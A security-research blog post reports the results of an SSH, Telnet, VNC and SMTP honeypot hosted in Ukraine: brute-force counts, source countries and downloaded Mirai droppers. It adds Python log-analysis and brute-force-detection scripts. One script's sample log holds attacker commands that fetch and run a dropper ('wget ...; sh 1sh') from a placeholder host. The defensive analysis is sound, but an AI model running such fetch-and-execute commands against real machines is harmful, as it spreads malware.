SpiderLabs Blog

Tough Times for Ukrainian Honeypot?


We've recently been inundated with news of increased cyberattacks and a general rise in online threats. Hackers, both bad and good, government-related or private groups, have their hands full every day as never before, and compounding the situation is the Russia-Ukraine (UA) war, which has sparked a cyber storm. This made us even more curious about Internet attacks on the UA telecom infrastructure. One would expect our research to turn up at least a few attacks from Russia, but, surprisingly, that was not the case.

More honeypots!

To take a closer look at the situation, I rented a VPS server located in UA. The requirement for this research was having an IP address originating from the UA pool. Unlike in my previous study, "A handshake with MySQL Bots", I didn't use original software (e.g. a MariaDB server for the MySQL service) to gather information from the given service; instead, I decided to use open-source honeypot projects. There are good and bad sides to this approach, but I was mainly focused on taking a general overview of what, how and from where attacks are made, rather than a detailed binary analysis.

The honeypot operated for three weeks, collecting information about authentication attempts on several services, mainly SSH, but also HTTP, Telnet, VNC and SMTP, and a few more:

[Figure: list of monitored honeypot services; not reproduced]

The main idea of the SSH sensor was to monitor and log what happens on one of the most sensitive services exposed on the Internet. For this purpose, I used a project called Kippo, which convincingly pretends to be an SSH service by mimicking an operating system. Kippo allowed me not only to see how usernames and passwords are being brute-forced, but also what happens after getting into the (in this case fake) operating system.

During the three weeks it operated, the honeypot counted over 50,000 authentication attempts. The honeypot was configured to simulate a successful login on every other attempt. Analyzing the logs, alongside simple Linux commands we mainly noticed attempts to download and run droppers and miners. More information about these files is at the bottom of the page.

[Screenshots: download URLs observed in SSH sessions, queried with DISTINCT; the totals 3378 and 749 appear at the top of each; not reproduced]

Please note the numbers 3378 and 749 at the top of each screenshot. These are the result counts of the same query run without the DISTINCT statement, which gives some perspective on the real number of download attempts.

Only some of the addresses listed above were still active. The samples that I initially analyzed turned out to be mostly part of the well-known Mirai botnet.

The top 20 passwords and usernames most often used during the brute-force attacks are listed below.

[Figure: top 20 SSH usernames and passwords; not reproduced]

And the number of connections made from each single IP, along with GeoIP information:

[Figure: SSH connections per source IP with GeoIP information; not reproduced]

Albania and Vietnam top the list.
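As an added illustration of the kind of log processing described above (not code from the original post or from the Kippo project), the following Python script parses a handful of constructed Kippo-style log lines and produces the same tallies the screenshots show: login attempts, most common usernames and passwords, connections per source IP, and download attempts counted both in total and after de-duplication, which is the total-versus-DISTINCT gap noted above. The log layout, the sample lines and the assumption that one transport id is one connection are mine, not taken from the post.

```python
"""Summarise Kippo-style SSH honeypot logs.

Added example, not code from the original post or from the Kippo project.
The log lines below are constructed to approximate Kippo's text log layout;
that layout is an assumption, as is treating one transport id as one connection.
"""
import re
from collections import Counter, namedtuple

Login = namedtuple("Login", "session ip user password result")
Command = namedtuple("Command", "session ip text")

# Constructed sample (RFC 5737 documentation addresses, not captured traffic).
SAMPLE_LOG = """\
2022-03-01 10:00:01+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/123456] failed
2022-03-01 10:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.10] login attempt [root/admin] succeeded
2022-03-01 10:00:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: wget http://198.51.100.5/1sh; sh 1sh
2022-03-01 10:05:00+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.20] login attempt [admin/admin] failed
2022-03-01 10:05:01+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.20] login attempt [root/123456] succeeded
2022-03-01 10:05:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.20] CMD: curl -O http://198.51.100.5/1sh
2022-03-01 10:07:00+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.10] login attempt [root/password] failed
2022-03-01 10:07:01+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.10] login attempt [user/123456] succeeded
2022-03-01 10:07:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.10] CMD: wget http://198.51.100.7/x86 -O /tmp/x86
"""

LOGIN_RE = re.compile(
    r"HoneyPotTransport,(\d+),([\d.]+)\] login attempt \[([^/\]]*)/([^\]]*)\] (succeeded|failed)"
)
CMD_RE = re.compile(r"HoneyPotTransport,(\d+),([\d.]+)\] CMD: (.*)")
# A URL ends at whitespace or a shell separator, so ".../1sh;" does not keep the ';'.
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")


def parse_log(text):
    """Split raw log text into login attempts and post-login commands."""
    logins, commands = [], []
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            session, ip, user, pw, result = m.groups()
            logins.append(Login(int(session), ip, user, pw, result))
            continue
        m = CMD_RE.search(line)
        if m:
            session, ip, cmd = m.groups()
            commands.append(Command(int(session), ip, cmd.strip()))
    return logins, commands


def download_attempts(commands):
    """Return (total URLs fetched, sorted distinct URLs): total vs. DISTINCT."""
    urls = [u for c in commands for u in URL_RE.findall(c.text)]
    return len(urls), sorted(set(urls))


def summarize(text, top_n=20):
    """Build the per-honeypot summary the post presents as screenshots."""
    logins, commands = parse_log(text)
    total, distinct = download_attempts(commands)
    # Assumption: one HoneyPotTransport id is one TCP connection; count ids per source IP.
    sessions_by_ip = {}
    for a in logins:
        sessions_by_ip.setdefault(a.ip, set()).add(a.session)
    return {
        "login_attempts": len(logins),
        "successful_logins": sum(1 for a in logins if a.result == "succeeded"),
        "top_usernames": Counter(a.user for a in logins).most_common(top_n),
        "top_passwords": Counter(a.password for a in logins).most_common(top_n),
        "connections_per_ip": {ip: len(s) for ip, s in sessions_by_ip.items()},
        "downloads_total": total,
        "downloads_distinct": len(distinct),
        "download_urls": distinct,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the constructed sample the script reports 6 login attempts, 3 downloads in total but only 2 distinct URLs, and two connections from the more persistent source; the same total/distinct split is what the 3378 and 749 figures above express for the real data.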

To monitor the other services, I used the heralding project, which logs only login credentials and connection data. This honeypot collected information for two weeks. For the following services, I focused mainly on GeoIP information.

The numbers of authentication attempts for each service:

[Figure: authentication attempts per service recorded by heralding; not reproduced]

Telnet, the archaic terminal protocol, is still quite popular, at least among attacking bots. Let's look at the collected data.

Top 20 login names:

[Figure: top 20 Telnet login names; not reproduced]

The number of connections made from a single IP along with GeoIP information:

[Figure: Telnet connections per source IP with GeoIP information; not reproduced]

China is noticeably in the lead.

Virtual Network Computing (VNC)

We might think that Virtual Network Computing would not find many users today, but it turns out that VNC still has many followers. According to Shodan, there are more than 320,000 devices on the Internet with a recognized VNC service, and more than 1 million devices with port 5900/TCP open. These numbers alone explain the bots' activity.

[Figure: VNC brute-force sources with GeoIP information; not reproduced]

We found only two active sources of attacks: Poland (7042 brute-force attempts) and Kazakhstan (62 brute-force attempts).


Attacks on the mail transport protocol were not very heavy, with just 14 unique source addresses counted.

[Figure: SMTP connections per source IP with GeoIP information; not reproduced]

The Netherlands and Lithuania top the list.


The honeypot wasn't able to collect any information about HTTPS activity, most likely because of its self-signed certificate and the lack of an associated domain name.

There were so few authentication attempts that I limited the results to just 10 in order to illustrate the activity.

[Figure: top 10 HTTP authentication attempts; not reproduced]

Authentication attempts on the other services were so few that we can easily leave them out of the conclusions.
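The per-service and per-source tallies shown from the heralding section onward can be reproduced from a heralding-style credential CSV with a few lines of Python. The script below is an added example, not code from the original post or from the heralding project; the column layout, the sample rows and the IP-to-country table are constructed assumptions (a real deployment would resolve countries with a GeoIP database instead of the table). It goes one step beyond the post's counts and also flags source/protocol pairs whose guessing arrives in bursts, which is the signal a defender would alert on rather than the raw total.

```python
"""Per-service and per-source tallies over a heralding-style authentication CSV,
plus a simple burst detector for brute-force sources.

Added example, not code from the original post or from the heralding project.
The column layout, the sample rows and the IP-to-country table are constructed
assumptions; a real deployment would use a GeoIP database for the lookup.
"""
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed rows (RFC 5737 documentation addresses); the layout is assumed.
SAMPLE_CSV = """\
timestamp,auth_id,session_id,source_ip,source_port,destination_ip,destination_port,protocol,username,password
2022-03-10 08:00:00.000000,1,s1,203.0.113.5,50000,192.0.2.1,23,telnet,root,admin
2022-03-10 08:00:05.000000,2,s1,203.0.113.5,50000,192.0.2.1,23,telnet,root,123456
2022-03-10 08:00:10.000000,3,s1,203.0.113.5,50000,192.0.2.1,23,telnet,admin,admin
2022-03-10 08:00:15.000000,4,s2,203.0.113.5,50001,192.0.2.1,23,telnet,root,root
2022-03-10 08:00:20.000000,5,s2,203.0.113.5,50001,192.0.2.1,23,telnet,support,support
2022-03-10 08:00:25.000000,6,s2,203.0.113.5,50001,192.0.2.1,23,telnet,user,user
2022-03-10 08:10:00.000000,7,s3,198.51.100.9,50100,192.0.2.1,5900,vnc,,password
2022-03-10 08:20:00.000000,8,s4,198.51.100.9,50101,192.0.2.1,5900,vnc,,123456
2022-03-10 08:30:00.000000,9,s5,198.51.100.9,50102,192.0.2.1,5900,vnc,,admin
2022-03-10 09:00:00.000000,10,s6,192.0.2.77,50200,192.0.2.1,25,smtp,info,info123
2022-03-10 09:05:00.000000,11,s7,203.0.113.5,50300,192.0.2.1,22,ssh,root,toor
2022-03-10 09:05:02.000000,12,s7,203.0.113.5,50300,192.0.2.1,22,ssh,root,qwerty
"""

# Constructed stand-in for a GeoIP lookup; the country codes are illustrative only.
COUNTRY_BY_IP = {"203.0.113.5": "CN", "198.51.100.9": "PL", "192.0.2.77": "NL"}
TS_FORMAT = "%Y-%m-%d %H:%M:%S.%f"


def load_auth_log(text):
    """Parse the CSV and attach a datetime to each row."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["ts"] = datetime.strptime(row["timestamp"], TS_FORMAT)
    return rows


def attempts_per_protocol(rows):
    """Authentication attempts per service, the first heralding chart in the post."""
    return Counter(row["protocol"] for row in rows)


def attempts_per_source(rows, lookup=COUNTRY_BY_IP):
    """(source_ip, country, attempts) sorted with the most active source first."""
    counts = Counter(row["source_ip"] for row in rows)
    return [(ip, lookup.get(ip, "??"), n) for ip, n in counts.most_common()]


def brute_force_sources(rows, threshold=5, window=timedelta(minutes=1)):
    """Flag (source_ip, protocol) pairs with >= threshold attempts inside any window.

    Sliding window over sorted timestamps: a slow trickle of guesses spread over
    hours is not flagged, while a burst within one minute is.
    """
    times_by_key = defaultdict(list)
    for row in rows:
        times_by_key[(row["source_ip"], row["protocol"])].append(row["ts"])
    flagged = set()
    for key, times in times_by_key.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(key)
                break
    return flagged


if __name__ == "__main__":
    rows = load_auth_log(SAMPLE_CSV)
    print("per protocol:", dict(attempts_per_protocol(rows)))
    print("per source:", attempts_per_source(rows))
    print("brute-force bursts:", brute_force_sources(rows))
```

With the defaults, only the Telnet source that makes six guesses in 25 seconds is flagged; the three VNC guesses spread over half an hour are not, even though their source is the second most active overall. Tightening the threshold and window (two attempts within five seconds) additionally catches the short SSH burst, which is the usual tuning trade-off between catching slow scanners and drowning in noise.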


Files downloaded during the SSH sessions (the filename and hash columns of the original table were mostly not preserved):

1sh / 2sh
Simple dropper script
36a5b9303d671f49e404791d53d1d96c /
Simple dropper script (multi-architecture targets)
Simple dropper script (multi-architecture targets)
Simple dropper script
Simple dropper script (multi-architecture targets)
Simple dropper script (multi-architecture targets)
Simple dropper script (multi-architecture targets)
Simple dropper script (multi-architecture targets)
Crypto-miner dropper
Crypto-miner dropper


Have tough times come for the Ukrainian Honeypot? Well, on this particular one, not really.

We didn't notice any IP coming from Russia. In fact, much of the exploitation we saw could have occurred regardless of where the honeypot was installed.

There could be many reasons for this. Our first thought is that elite hacking groups don't necessarily pounce on a newly emerging server on the Internet. Instead, these groups have set targets on which they focus their time and energy. What our honeypot experiment did prove is that bots still function in their usual fashion, lazily attacking everything they can connect to on the Internet. Additionally, we found that brute-force attacks are a constant threat to poorly managed infrastructures, servers, and IoT devices.
